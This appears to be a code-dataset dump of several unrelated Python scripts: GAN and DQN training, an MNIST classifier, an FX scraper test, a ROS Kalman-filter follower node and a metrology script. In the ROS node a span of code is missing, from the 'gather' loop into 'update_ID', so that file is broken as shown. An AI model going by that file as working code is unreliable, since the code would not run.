(128,128), interpolation=cv2.INTER_LINEAR).transpose(2, 0, 1)\r\n image = image.astype(np.float32)\r\n image /= 255.0\r\n return image\r\n\r\nfrom CoppeliaSim_RGAN import CoppeliaSim_RGAN\r\nenv = CoppeliaSim_RGAN()\r\nenv.reset()\r\n\r\n# from __future__ import print_function\r\nimport random\r\nimport os\r\nfrom torch.nn import functional as F\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.parallel\r\nimport torch.optim as optim\r\nimport torchvision.utils as vutils\r\nfrom torch.autograd import Variable\r\nfrom utils import lineplot\r\n\r\nimport networkRGAN\r\nfrom torchsummary import summary\r\n\r\nnp.random.seed(42)\r\nrandom.seed(10)\r\ntorch.backends.cudnn.deterministic = True\r\ntorch.backends.cudnn.benchmark = False\r\ntorch.manual_seed(999)\r\n\r\nmetrics = {'steps': [],'observation_loss': []}\r\n\r\n\r\ngpu_id = 0\r\ndevice = torch.device(\"cuda\", gpu_id)\r\n\r\n\r\nEncoder = torch.load('Encoder_10000.pt')\r\nDecoder = torch.load('Decoder_10000.pt')\r\nDis = torch.load('Dis_10000.pt')\r\n\r\n# Here is where you set how important each component of the loss function is:\r\nL1_factor = 0\r\nL2_factor = 1\r\nGAN_factor = 1\r\nRec_factor = 0.2\r\n\r\ncriterion = nn.BCELoss() # Binary cross entropy loss\r\n\r\n# Optimizers for the generator and the discriminator (Adam is a fancier version of gradient descent with a few more bells and whistles that is used very often):\r\noptimizerDis = optim.Adam(Dis.parameters(), lr = 0.0001, betas = (0.5, 0.999))\r\noptimizerEncoder = optim.Adam(Encoder.parameters(), lr = 0.0001, betas = (0.5, 0.999), eps = 1e-8)\r\noptimizerDecoder = optim.Adam(Decoder.parameters(), lr = 0.0001, betas = (0.5, 0.999), eps = 1e-8)\r\n\r\ndef create_batch_data(environment,\r\n batch_size,\r\n picture_size=128):\r\n\r\n Rel = np.ones((batch_size, 3,picture_size,picture_size))\r\n Pre = np.ones((batch_size, 3,picture_size,picture_size))\r\n \r\n action = torch.from_numpy(env.action_space.sample()) \r\n next_obs, done= env.step(action)\r\n \r\n for i in range(batch_size):\r\n if done == False:\r\n obs = next_obs\r\n elif done == True:\r\n obs = env.reset()\r\n # print(1)\r\n \r\n pic1, pic2 = obs\r\n Pre[i] = pre_pos(pic1)\r\n Rel[i] = pre_pos(pic2)\r\n \r\n action = torch.from_numpy(env.action_space.sample()) \r\n next_obs, done= env.step(action)\r\n \r\n \r\n \r\n return 
Rel, Pre\r\n\r\n# Create a directory for the output files\r\ndirect_name = 'GAN-v3'\r\nbatch_size = 1\r\nimage_period = 500\r\nmodel_period = 5000\r\n\r\n\r\ntry:\r\n os.mkdir(direct_name)\r\nexcept OSError:\r\n pass\r\nresults_dir = direct_name\r\nt = 0\r\nt_image = int(image_period / batch_size)\r\nt_model = int(model_period / batch_size)\r\ndone = False\r\nfor _ in range(100000):\r\n \r\n\r\n Rel, Pre = create_batch_data(env,batch_size)\r\n\r\n\r\n # TRAINING THE DISCRIMINATOR\r\n Dis.zero_grad()\r\n Rel = torch.tensor(Rel)\r\n real = Variable(Rel).type('torch.FloatTensor').to(device)\r\n target = Variable(torch.ones(real.size()[0])).to(device)\r\n output = Dis(real)\r\n errD_real = criterion(output, target)\r\n \r\n Pre = torch.tensor(Pre)\r\n predict = Variable(Pre).type('torch.FloatTensor').to(device)\r\n generated = Encoder(predict)\r\n generated = Decoder(generated.detach())\r\n \r\n target = Variable(torch.zeros(real.size()[0])).to(device)\r\n output = Dis(generated.detach()) # detach() because we are not training G here\r\n errD_fake = criterion(output, target)\r\n\r\n errD = errD_real + errD_fake\r\n errD.backward() \r\n optimizerDis.step()\r\n\r\n # TRAINING THE GENERATOR\r\n Encoder.zero_grad()\r\n Decoder.zero_grad()\r\n \r\n target = Variable(torch.ones(real.size()[0])).to(device)\r\n output = Dis(generated)\r\n\r\n # G wants to :\r\n # (a) have the synthetic images be accepted by D (= look like frontal images of people)\r\n errG_GAN = criterion(output, target) \r\n errG_Rec = F.mse_loss(real, generated, reduction='none').sum().mean()#data.cpu().numpy()\r\n\r\n errG = (GAN_factor * errG_GAN) + (errG_Rec * Rec_factor)\r\n\r\n errG.backward()\r\n # Update G\r\n optimizerEncoder.step()\r\n optimizerDecoder.step()\r\n\r\n \r\n t += 1 \r\n \r\n print('t = ' + str(t) + ', ' + str(errG_Rec/batch_size))\r\n obs_err = F.mse_loss(real, generated, reduction='none').sum().mean().data.cpu().numpy()\r\n metrics['observation_loss'].append(errG_Rec.cpu().detach().numpy()/batch_size)\r\n metrics['steps'].append(t)\r\n lineplot(metrics['steps'][-len(metrics['observation_loss']):], metrics['observation_loss'], 'observation_loss', results_dir)\r\n \r\n if t % t_image == 0:\r\n vutils.save_image(predict[0].data, direct_name+'/%03d_input.jpg' % (t), normalize=True)\r\n vutils.save_image(real[0].data, direct_name+'/%03d_real.jpg' % (t), normalize=True)\r\n vutils.save_image(generated[0].data, direct_name+'/%03d_generated.jpg' % (t), normalize=True)\r\n \r\n # Save the pre-trained Generator as well\r\n if t % t_model == 0:\r\n tempresults_dir = './'+direct_name+'/%s%d' % ('t',t)\r\n try:\r\n os.mkdir(tempresults_dir)\r\n except OSError:\r\n pass\r\n torch.save(Encoder,tempresults_dir+'/Encoder_%d.pt' % (t))\r\n torch.save(Decoder,tempresults_dir+'/Decoder_%d.pt' % (t))\r\n torch.save(Dis,tempresults_dir+'/Dis_%d.pt' % (t)) \r\n","sub_path":"runRGAN.py","file_name":"runRGAN.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"522838279","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom cart_env import CartEnv\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\n\r\n# Hyper Parameters\r\nBATCH_SIZE = 32\r\nLR = 0.02 # learning rate\r\nEPSILON = 0.8 # greedy policy\r\nGAMMA = 0.99 # reward discount\r\nTARGET_REPLACE_ITER = 50 # target update frequency\r\nMEMORY_CAPACITY = 
2000\r\n\r\nenv=CartEnv(step_time=0.02)\r\nenv.add_obstacle([[0.5,0.5],[0.5,1],[1.5,0.5],[1.5,1]])\r\n\r\nN_ACTIONS = 3\r\nN_STATES = 3\r\nENV_A_SHAPE = 0\r\n\r\nclass Net(nn.Module):\r\n def __init__(self, ):\r\n super(Net, self).__init__()\r\n self.fc1 = nn.Linear(N_STATES, 15)\r\n self.fc1.weight.data.normal_(0, 0.1) # initialization\r\n self.out = nn.Linear(15, N_ACTIONS)\r\n self.out.weight.data.normal_(0, 0.1) # initialization\r\n\r\n def forward(self, x):\r\n x = self.fc1(x)\r\n x = F.relu(x)\r\n actions_value = self.out(x)\r\n return actions_value\r\n\r\n\r\nclass DQN(object):\r\n def __init__(self):\r\n self.eval_net, self.target_net = Net(), Net()\r\n\r\n self.learn_step_counter = 0 # for target updating\r\n self.memory_counter = 0 # for storing memory\r\n self.memory = np.zeros((MEMORY_CAPACITY, N_STATES * 2 + 2)) # initialize memory\r\n self.optimizer = torch.optim.Adam(self.eval_net.parameters(), lr=LR)\r\n self.loss_func = nn.MSELoss()\r\n\r\n def choose_action(self, x):\r\n x = torch.unsqueeze(torch.FloatTensor(x), 0)\r\n # input only one sample\r\n if np.random.uniform() < EPSILON: # greedy\r\n actions_value = self.eval_net.forward(x)\r\n action = torch.max(actions_value, 1)[1].data.numpy()\r\n action = action[0] if ENV_A_SHAPE == 0 else action.reshape(ENV_A_SHAPE) # return the argmax index\r\n else: # random\r\n action = np.random.randint(0, N_ACTIONS)\r\n action = action if ENV_A_SHAPE == 0 else action.reshape(ENV_A_SHAPE)\r\n return action\r\n\r\n def store_transition(self, s, a, r, s_):\r\n transition = np.hstack((s, [a, r], s_))\r\n # replace the old memory with new memory\r\n index = self.memory_counter % MEMORY_CAPACITY\r\n self.memory[index, :] = transition\r\n self.memory_counter += 1\r\n\r\n def learn(self):\r\n # target parameter update\r\n if self.learn_step_counter % TARGET_REPLACE_ITER == 0:\r\n self.target_net.load_state_dict(self.eval_net.state_dict())\r\n self.learn_step_counter += 1\r\n\r\n # sample batch transitions\r\n sample_index = np.random.choice(MEMORY_CAPACITY, BATCH_SIZE)\r\n b_memory = self.memory[sample_index, :]\r\n b_s = torch.FloatTensor(b_memory[:, :N_STATES])\r\n b_a = torch.LongTensor(b_memory[:, N_STATES:N_STATES+1].astype(int))\r\n b_r = torch.FloatTensor(b_memory[:, N_STATES+1:N_STATES+2])\r\n b_s_ = torch.FloatTensor(b_memory[:, -N_STATES:])\r\n\r\n # q_eval w.r.t the action in experience\r\n q_eval = self.eval_net(b_s).gather(1, b_a) # shape (batch, 1)\r\n q_next = self.target_net(b_s_).detach() # detach from graph, don't backpropagate\r\n q_target = b_r + GAMMA * q_next.max(1)[0].view(BATCH_SIZE, 1) # shape (batch, 1)\r\n loss = self.loss_func(q_eval, q_target)\r\n \r\n self.optimizer.zero_grad()\r\n loss.backward()\r\n self.optimizer.step()\r\n\r\ndqn = DQN()\r\n\r\n\r\n# To act greedily, just load the pkl file saved from a training. 
and set gamma = 1.\r\n# dqn.eval_net=torch.load('xxxxxxx')\r\n# GAMMA =1\r\n\r\n\r\nprint('\\nCollecting experience...')\r\nfor i_episode in range(300):\r\n state = env.reset()\r\n episode_reward = 0\r\n\r\n # x,y used to plot the trajectory\r\n x=[]\r\n y=[]\r\n plt.ion()\r\n plt.cla()\r\n ax=plt.gca()\r\n\r\n for step in range(1000):\r\n action = dqn.choose_action(state)\r\n\r\n # take action\r\n next_state, reward, done, info = env.step(action)\r\n\r\n x.append(next_state[0])\r\n y.append(next_state[1])\r\n\r\n dqn.store_transition(state, action, reward, next_state)\r\n episode_reward += reward # It's an approximate value; gamma is not considered here\r\n\r\n if dqn.memory_counter > MEMORY_CAPACITY:\r\n dqn.learn()\r\n if done:\r\n print('Episode: ', i_episode,\r\n '| Episode_reward: ', round(episode_reward, 2))\r\n\r\n if done:\r\n break\r\n state = next_state\r\n\r\n\r\n # plot this episode\r\n ax.set_xlim(-0.5,2)\r\n ax.set_ylim(-0.5,2)\r\n plt.title('epoch{0}'.format(i_episode))\r\n ax.plot(x,y)\r\n env.cart_poly.plot(ax,color='green')\r\n env.goal.plot(ax,alpha=0.3,color='red')\r\n env.obstacles[0].plot(ax,alpha=1,color='pink')\r\n plt.pause(0.5)\r\n\r\n\r\n# save the neural network\r\ntorch.save(dqn.eval_net, 'cart_DQN.pkl')","sub_path":"RL_training.py","file_name":"RL_training.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"106483065","text":"import tensorflow as tf \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport numpy as np \nfrom sklearn.model_selection import train_test_split\n\nplt.rcParams['figure.figsize'] = (10.0, 8.0)\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\ntrain = pd.read_csv('digit-recognizer/train.csv')\ntest = pd.read_csv('digit-recognizer/test.csv')\n\n### transform train and test into image/label\nx_train = train.drop(['label'], axis=1).values.astype('float32') # all pixel values\ny_train = train['label'].values.astype('int32') # only labels i.e targets digits\ntest = test.values.astype('float32')\n\nx_train = x_train.reshape(x_train.shape[0], 28, 28) / 255.0\ntest = test.reshape(test.shape[0], 28, 28) / 255.0\n\n\n# renamed x_test -> x_val: the held-out split is a validation set, and the old\n# names paired x_test with y_val inconsistently\nx_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size = 0.1, random_state=42)\n##plt.imshow(x_train[0])\n##print(y_train[0])\n##plt.show()\n\nmodel = tf.keras.models.Sequential()\nmodel.add(tf.keras.layers.Flatten())\nmodel.add(tf.keras.layers.Dense(128,activation = tf.nn.relu))\nmodel.add(tf.keras.layers.Dense(128,activation = tf.nn.relu))\nmodel.add(tf.keras.layers.Dense(10,activation = tf.nn.softmax))\n\nmodel.compile(optimizer =\"adam\",\n\tloss =\"sparse_categorical_crossentropy\",\n\tmetrics = ['accuracy'])\n\nmodel.fit(x_train, y_train,epochs = 3)\n\nval_loss, val_acc = model.evaluate(x_val, y_val)\nprint(val_loss,val_acc)\nmodel.save(\"method2.model\")\nprint(type(test))\nmodel2 = tf.keras.models.load_model(\"method2.model\")\npredictions = model2.predict(test)\n\nf = open(\"testresults.csv\",\"w+\")\nf.write(\"ImageId,Label\"+\"\\n\")\nfor i, probs in enumerate(predictions, start=1):\n\tf.write(str(i)+\",\"+str(np.argmax(probs))+'\\n')\nf.close()\n#results = 
np.argmax(predictions)\n#print(predictions[0])\n#print(predictions.shape)\n\n#print(np.argmax(predictions[0]))\n#plt.imshow(test[0])\n#plt.show()\n\n\n","sub_path":"MNIST_image_recognition/method2.py","file_name":"method2.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"446634560","text":"\n\n#calss header\nclass _ROLE():\n\tdef __init__(self,): \n\t\tself.name = \"ROLE\"\n\t\tself.definitions = [u'the position or purpose that someone or something has in a situation, organization, society, or relationship: ', u\"an actor's part in a film or play: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_role.py","file_name":"_role.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"296180793","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport FinanceBot.scrapers.fxstreet as fxstreet\nfrom mock import Mock\nfrom nose import tools\nimport os\nimport datetime\nimport pytz\nthis_dir = os.path.dirname(os.path.abspath(__file__))\nHEADER_REF = {'content-length': '85360',\n 'x-aspnet-version': '4.0.30319',\n 'set-cookie': 'ASP.NET_SessionId=tabildbdzzqmaknsc5l4mjcr; path=/; HttpOnly',\n 'x-powered-by': 'ASP.NET',\n 'server': 'Microsoft-IIS/8.0',\n 'connection': 'close',\n 'cache-control': 'private',\n 'date': 'Fri, 27 Mar 2015 14:15:21 GMT',\n 'content-type': 'text/html; charset=utf-8'}\nREFERENCE = (datetime.datetime(2015, 3, 27, 23, 15, 21, tzinfo=pytz.timezone('Asia/Tokyo')),\n {'EURJPY': {'high': 129.885, 'bid': 129.548, 'open': 129.727, 'low': 129.032, 'change': -0.167},\n 'USDCHF': {'high': 0.9694, 'bid': 0.9612, 'open': 0.9629, 'low': 0.9607, 'change': -0.0017},\n 'GBPUSD': {'high': 1.4922, 'bid': 1.4914, 'open': 1.4849, 'low': 1.4797, 'change': 0.0064},\n 'EURGBP': {'high': 0.7336, 'bid': 0.7304, 'open': 0.733, 'low': 0.7266, 'change': -0.0025},\n 'EURCHF': {'high': 1.051, 'bid': 1.0466, 'open': 1.0482, 'low': 1.0455, 'change': -0.0016},\n 'GBPJPY': {'high': 177.939, 'bid': 177.447, 'open': 176.985, 'low': 176.704, 'change': 0.46},\n 'AUDUSD': {'high': 0.7837, 'bid': 0.7785, 'open': 0.7828, 'low': 0.7775, 'change': -0.0043},\n 'EURUSD': {'high': 1.0898, 'bid': 1.0888, 'open': 1.0884, 'low': 1.0801, 'change': 0.0004},\n 'GBPCHF': {'high': 1.4406, 'bid': 1.4335, 'open': 1.4302, 'low': 1.4296, 'change': 0.0036},\n 'USDJPY': {'high': 119.5, 'bid': 118.982, 'open': 119.188, 'low': 118.928, 'change': -0.205},\n 'USDCAD': {'high': 1.253, 'bid': 1.2508, 'open': 1.2483, 'low': 1.2466, 'change': 0.0025},\n 'GBPCAD': {'high': 1.8658, 'bid': 1.8654, 'open': 1.8536, 'low': 1.8523, 'change': 0.0117}})\n\n\ndef test_get_currency():\n fxstreet.urllib.urlopen = Mock()\n fxstreet.urllib.urlopen.return_value.read.return_value = open(this_dir + '/test_data/forex-rates.html').read()\n fxstreet.urllib.urlopen.return_value.headers.dict = HEADER_REF\n scraper = fxstreet.FxstreetScraper()\n tools.eq_(scraper.get_currency(), REFERENCE)\n","sub_path":"test/scrapers/test_fxstreet.py","file_name":"test_fxstreet.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"403013653","text":"# -*- coding:utf-8 -*-\n__author__ = 'IanChen'\n\n''' 
The plain-text file city.txt holds city information; its content (including the curly braces) looks like this:\n\n{\n \"1\" : \"上海\",\n \"2\" : \"北京\",\n \"3\" : \"成都\"\n}\n'''\n\nfrom collections import OrderedDict\nimport json,xlwt\n\nwith open(\"wenben2.txt\",'r') as f:\n data = json.load(f,object_pairs_hook=OrderedDict) # the order matches the order defined in the text file\n workbook=xlwt.Workbook()\n sheet= workbook.add_sheet(\"city\",cell_overwrite_ok=True)\n for index,(key,value) in enumerate(data.items()):\n sheet.write(index,0,key)\n sheet.write(index,1,value)\n workbook.save(\"F:/excercise/002/table/city.xls\")\n","sub_path":"excercise-master/002/question0015.py","file_name":"question0015.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"419367557","text":"#! /usr/bin/env python\nimport logging\nfrom os import cpu_count\nimport numpy as np\nimport rospy\nfrom fairmot_ros_wzq.msg import people_item ,people_list\nfrom sensor_msgs.msg import PointCloud\nfrom geometry_msgs.msg import PoseStamped\nfrom nlink_example.msg import UwbFilter\nimport message_filters\nfrom numpy import matrixlib as mt\n\ngoal_ID = 0 # ID of the tracked person\nID_list = [] # history of tracked IDs\nlist_max = 100 # maximum number of stored IDs\ncount = 0 # 0 until the tracker is initialized\nstored_points = [] # stored trajectory points\nign = 0\nmax_ign = 5\nlost = False\n\nclass kalman_filter():\n def __init__(self, A, B, H, R, Q, x0, P0):\n self.A = mt.mat(np.array(A, dtype=np.float32))\n self.B = mt.mat(np.array(B, dtype=np.float32))\n self.H = mt.mat(np.array(H, dtype=np.float32))\n self.R = mt.mat(np.array(R, dtype=np.float32))\n self.Q = mt.mat(np.array(Q, dtype=np.float32))\n self.x0 = mt.mat(np.array(x0, dtype=np.float32))\n self.P0 = mt.mat(np.array(P0, dtype=np.float32))\n self.x_pre = self.x0\n self.P_pre = self.P0\n\n self.K = (self.P0*self.H.T)*((self.H*self.P0*self.H.T+self.R).I)\n # print(self.x_pre)\n self.I = np.eye((self.K*self.H).shape[0],(self.K*self.H).shape[1])\n\n # no external control input\n self.u = 0.\n def run(self, data):\n z = mt.mat(np.array([[data[0]],[data[1]]], dtype=np.float32))\n self.predict()\n self.update(z)\n\n return self.x_pre, self.P_pre \n\n def predict(self):\n self.x_pre = self.A*self.x_pre + self.B*self.u\n self.P_pre = self.A*self.P_pre*self.A.T + self.Q\n \n def update(self, z):\n self.K = (self.P_pre*self.H.T)*((self.H*self.P_pre*self.H.T+self.R).I)\n self.x_pre = self.x_pre + self.K*(z - self.H*self.x_pre)\n self.P_pre = (self.I - self.K*self.H)*self.P_pre\n
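\n# (Editor's note, added) Minimal usage sketch for the filter above -- hypothetical\n# numbers, shown only to make the predict/update cycle concrete; not executed here:\n# kf = kalman_filter(A=[[1,0],[0,1]], B=0, H=[[1,0],[0,1]],\n#                    R=[[0.01,0],[0,0.01]], Q=[[0.0001,0],[0,0.0001]],\n#                    x0=[[0.],[0.]], P0=[[1,0],[0,1]])\n# x, P = kf.run([0.1, 0.2])  # one measurement -> one predict + update step\n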
\nclass trajectory(object):\n def __init__(self, image_points, uwb_points, A,B,H,R1,Q1,R2,Q2,x0_i,x0_u,P0):\n self.image_track = []\n self.uwb_track = []\n self.mix_track = []\n self.image_track.append(image_points)\n self.uwb_track.append(uwb_points)\n \n self.ign = 0\n self.max_ign = 5\n\n self.max_points = 50\n self.count = len(self.image_track)\n\n self.kalman_filter = []\n filter1=kalman_filter(A,B,H,R1,Q1,x0_i,P0)\n filter2=kalman_filter(A,B,H,R2,Q2,x0_u,P0)\n self.kalman_filter.append(filter1)\n self.kalman_filter.append(filter2)\n\n def update(self, image_point, uwb_point): # update the track; when the image point is missing, interpolate it from the uwb point\n x_uwb, P_uwb = self.kalman_filter[1].run(uwb_point)\n if len(self.uwb_track)>=self.max_points:\n self.uwb_track.pop(0)\n self.uwb_track.append(x_uwb)\n else:\n self.uwb_track.append(x_uwb)\n\n if image_point == []:\n if len(self.image_track)<=4:\n image_point = self.diff(self.image_track)\n else:\n # curve fitting (disabled)\n # x,y = self.gather(self.image_track, 2)\n # print(self.image_track)\n # print(x)\n # print(y)\n # p = np.polyfit(x,y,2)\n # x_pre = uwb_point[0]\n # y_pre = np.polyval(p,x_pre)\n # image_point = [x_pre, y_pre, self.image_track[self.count-1][2]]\n \n # interpolation (disabled)\n # points = []\n # for i in range(4):\n # points.append(self.image_track[len(self.image_track)-4+i])\n # image_point = self.diff(points)\n image_point = [self.image_track[self.count-1][0,0],\n self.image_track[self.count-1][1,0]]\n\n x_image, P_image = self.kalman_filter[0].run(image_point)\n\n if len(self.image_track)>=self.max_points:\n self.image_track.pop(0)\n self.image_track.append(x_image)\n else:\n self.image_track.append(x_image)\n self.count = self.count + 1\n \n P_mix = (P_uwb.I+P_image.I).I\n x_mix = P_mix*(P_uwb.I*x_uwb + P_image.I*x_image)\n self.mix_track.append(x_mix)\n \n # compute the direction of travel of the track\n if len(self.mix_track)<6:\n orientation = np.array([[1],[0]], dtype=np.float32)\n else:\n l = len(self.mix_track)\n s1 = np.array(np.zeros((2,1)), dtype=np.float32)\n s2 = np.array(np.zeros((2,1)), dtype=np.float32)\n for i in range(l-4,l-2):\n s1 = s1 + self.mix_track[i].getA()/2\n for i in range(l-2,l):\n s2 = s2 + self.mix_track[i].getA()/2\n orientation = s2 - s1\n \n yaw = np.math.atan(orientation[1]/orientation[0])*360/(2*np.math.pi) \n roll = 0\n pitch = 0\n cy = np.math.cos(yaw*np.math.pi/360)\n sy = np.math.sin(yaw*np.math.pi/360)\n cp = np.math.cos(pitch*np.math.pi/360)\n sp = np.math.sin(pitch*np.math.pi/360)\n cr = np.math.cos(roll*np.math.pi/360)\n sr = np.math.sin(roll*np.math.pi/360)\n qw = cy*cp*cr+sy*sp*sr\n qx = cy*cp*sr-sy*sp*cr\n qy = sy*cp*sr+cy*sp*cr\n qz = sy*cp*cr-cy*sp*sr\n q = [qw,qx,qy,qz]\n \n return x_image, x_uwb, x_mix, q\n\n def diff(self, points):\n x = [p[0] for p in points]\n y = [p[1] for p in points]\n if len(points)==1:\n x_pre = x[0]\n y_pre = y[0]\n else:\n x1 = np.mean([x[i] for i in range(len(points)//2)])\n x2 = np.mean([x[i] for i in range(len(points)//2,len(points))])\n y1 = np.mean([y[i] for i in range(len(points)//2)])\n y2 = np.mean([y[i] for i in range(len(points)//2,len(points))])\n x_pre = x2+(x2-x1)*(1/2+1/(len(points)//2))\n y_pre = y2+(y2-y1)*(1/2+1/(len(points)//2))\n point_pre = [x_pre,y_pre]\n\n return point_pre\n \n def gather(self,points,n):\n x = [point[0] for point in self.image_track]\n y = [point[1] for point in self.image_track]\n i = 0\n count = 0\n sum_x = 0\n sum_y = 0\n gather_x = []\n gather_y = []\n # NOTE (editor): the body of this loop, its return statement, init_ID and\n # most of update_ID were lost in extraction; the code below is a minimal\n # reconstruction inferred from the surviving variable names and call sites.\n while i < len(x):\n sum_x += x[i]\n sum_y += y[i]\n count += 1\n i += 1\n if count == n:\n gather_x.append(sum_x/n)\n gather_y.append(sum_y/n)\n sum_x = 0\n sum_y = 0\n count = 0\n return gather_x, gather_y\n\n\ndef init_ID(people_list_data):\n # reconstructed (assumption): lock on to the first detected person\n global goal_ID\n goal_ID = people_list_data.people_items[0].people_ID\n\n\ndef update_ID(people_list_data, uwb_data):\n # reconstructed (assumption): count consecutive frames in which the tracked\n # ID is missing from the detection list\n global ign, lost\n ids = [item.people_ID for item in people_list_data.people_items]\n if goal_ID in ids:\n ign = 0\n else:\n ign = ign + 1\n if ign>max_ign: # decide whether the target should be considered lost\n lost = True\n else:\n lost = False\n
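\n# (Editor's note, added) Sanity note on the quaternion block in\n# trajectory.update(): with roll = pitch = 0 the ZYX formula reduces to a pure\n# yaw rotation, q = (cos(yaw/2), 0, 0, sin(yaw/2)); the pi/360 factor converts\n# degrees to radians while halving the angle in one step. Illustrative helper\n# (not called anywhere):\ndef _yaw_to_quaternion(yaw_deg):\n cy = np.math.cos(yaw_deg*np.math.pi/360)\n sy = np.math.sin(yaw_deg*np.math.pi/360)\n return [cy, 0.0, 0.0, sy] # [w, x, y, z]\n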
\n\ndef callback(people_list_data, uwb_data):\n global count, track\n\n image_point = []\n uwb_point = [uwb_data.point.x, uwb_data.point.y, uwb_data.point.z]\n if (count == 0): # initialize the target ID\n if people_list_data.people_items:\n init_ID(people_list_data)\n for item in people_list_data.people_items:\n if item.people_ID == goal_ID:\n image_point = [item.points.x,item.points.y,item.points.z]\n track = trajectory(image_point, uwb_point,\n A=[[1,0],[0,1]],\n B=0,H=[[1,0],[0,1]],\n R1=[[0.01,0],[0,0.01]],\n Q1=[[0.0001,0],[0,0.0001]],\n R2=[[0.01,0],[0,0.01]],\n Q2=[[0.0001,0],[0,0.0001]],\n x0_i=[[image_point[0]],[image_point[1]]],\n x0_u=[[uwb_point[0]],[uwb_point[1]]],\n P0=[[1,0],[0,1]])\n count = count + 1\n else:\n rospy.loginfo('At the beginning, cannot find a person!') # was Logger.info, called on the logging.Logger class itself\n elif (count>0):\n if people_list_data.people_items:\n for item in people_list_data.people_items:\n if item.people_ID == goal_ID:\n image_point = [item.points.x,item.points.y,item.points.z]\n update_ID(people_list_data, uwb_data)\n # store and update the image/uwb track points\n x_img, x_uwb, x_mix, orientation = track.update(image_point, uwb_point)\n goal_msg = PoseStamped()\n goal_msg.header.frame_id = 'map'\n goal_msg.header.stamp = rospy.Time.now()\n goal_msg.pose.position.x = x_mix[0][0]\n goal_msg.pose.position.y = x_mix[1][0]\n goal_msg.pose.orientation.w = orientation[0]\n goal_msg.pose.orientation.x = orientation[1]\n goal_msg.pose.orientation.y = orientation[2]\n goal_msg.pose.orientation.z = orientation[3]\n goal_pub.publish(goal_msg)\n count = count + 1\n\n else:\n rospy.loginfo('Cannot find a person; please stand in front of the camera!') # was Logger.info\n\n \n\n\ndef goal():\n rospy.init_node(\"goal\", anonymous=True)\n people_list_data = message_filters.Subscriber(\"people_list\", people_list)\n # rslidar_points = message_filters.Subscriber(\"rslidar_points\", PointCloud2)\n uwb_data = message_filters.Subscriber(\"uwb_filter\", UwbFilter)\n # sub = message_filters.ApproximateTimeSynchronizer([people_centriod, rslidar_points, uwb_filter], 10, 1, allow_headerless=True)\n sub = message_filters.ApproximateTimeSynchronizer([people_list_data, uwb_data], 10, 1, allow_headerless=False)\n sub.registerCallback(callback)\n \n rospy.spin()\n\n\nif __name__=='__main__':\n goal_pub = rospy.Publisher('goal', PoseStamped, queue_size=10)\n goal()","sub_path":"scripts/goal.py","file_name":"goal.py","file_ext":"py","file_size_in_byte":11577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"339844819","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 7 21:47:49 2020\n@author: apple\n\"\"\"\nimport csv\nimport numpy as np\n\n#import matplotlib.pyplot as plt\n#import shapely\nfrom shapely.geometry import LineString, Point\nimport math \n\nfrom func_Metrology import GC,GC2,angle,rotate, length, dotproduct, Tria, GCenter\nfrom numpy import genfromtxt\nimport pandas as pd\n\n#xls = pd.read_excel('data1.xlsx')\n#df = pd.read_excel(xls, 'Sheet1')\n#df = pd.read_excel(\"data2.xlsx\", \"Module4_R2_with_standard_bot_re\")\n#df = pd.read_excel(\"data2.xlsx\", \"Module4_R2_with_standard\")\ndf = pd.read_excel(\"data2.xlsx\", \"Module4_brown\")\n\n#df = pd.read_excel(\"data2.xlsx\", \"Module4_brown\")\n\ndf1 = pd.DataFrame(df, columns= ['x'])\ndf2 = pd.DataFrame(df, columns= ['y'])\n\npx = df1['x']; py = df2['y']\n\n\nnt = []; nb = []; mt = []; mb = []\nfor x in range(0,4):\n nt.append(np.array([px[x],py[x]],dtype=np.float))\nfor x in range(4,8):\n nb.append(np.array([px[x],py[x]],dtype=np.float))\nfor x in range(8,12):\n mt.append(np.array([px[x],py[x]],dtype=np.float))\nfor x in range(12,16):\n mb.append(np.array([px[x],py[x]],dtype=np.float)) \n\n#print('array nt = ',nt, '\\n\\narray nb = ',nb, '\\n\\narray mt = ',mt, '\\n\\narray mb = ',mb)\nprint('\\narray mt = ',mt, '\\narray mb = ',mb)\n\n\n\n\ntrans_rotated_mt_2 = [np.array([2314.01, 2364.18]), np.array([104393.25, -209.71]), np.array([106746.27, 93352.62]), np.array([ 4671.45, 95931.25])]\ntop_sensor_after_translation = [np.array([6860.15320168, -687.608018 ]), np.array([108948.99320168, 2250.991982 ]), np.array([106257.35320168, 95817.821982 ]), np.array([ 4172.63320168, 92879.781982 ])]\n\n\no_b = GCenter(trans_rotated_mt_2) #GC of top needle frame\n\nnb_dig=[]\nfor x in top_sensor_after_translation:\n nb_dig.append(x - o_b)\ntrans_nt_dig=[]\nfor x in trans_rotated_mt_2:\n trans_nt_dig.append(x - o_b)\n\nA=[0,0,0,0]\nfor i in range(4):\n A[i]= angle(nb_dig[i],trans_nt_dig[i])\nprint('Angle 1 of rotation in radian= ', A[0])\n#print('Angle 2 of rotation in radian= ', 